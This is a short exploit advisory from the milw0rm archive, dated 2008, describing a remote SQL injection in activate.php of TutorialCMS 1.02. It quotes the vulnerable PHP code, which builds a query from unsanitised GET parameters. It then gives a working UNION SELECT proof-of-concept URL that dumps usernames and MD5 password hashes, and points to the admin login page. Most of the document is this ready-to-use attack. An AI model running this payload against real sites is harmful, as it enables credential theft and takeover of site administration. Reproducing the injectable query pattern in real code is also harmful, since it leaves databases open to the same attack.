TutorialCMS 1.02 Remote SQL Injection Vulnerability
bug found by ka0x
contact: ka0x01[at]gmail.com
D.O.M TEAM 2008
we are: ka0x, an0de, xarnuz
#from spain
download http://www.wavelinkmedia.com/scripts/tutorialcms/
need magic_quotes_gpc = off
vulnerability in activate.php
vuln code:
$userName = $_GET["userName"];
$code = $_GET["activate"];
$sql = "SELECT activated FROM users WHERE username = '$userName' AND activated = '$code'";
User and Password from mysql.user:
POC: http://[host]/activate.php?userName='/**/union/**/select/**/1,2,3,4,concat(0x757365723a20,username,0x20706173733a20,password),6,7,8,9,9,9,9,9/**/from/**/users/*
The encription of password is MD5
login: http://[host]/admin
# milw0rm.com [2008-01-12]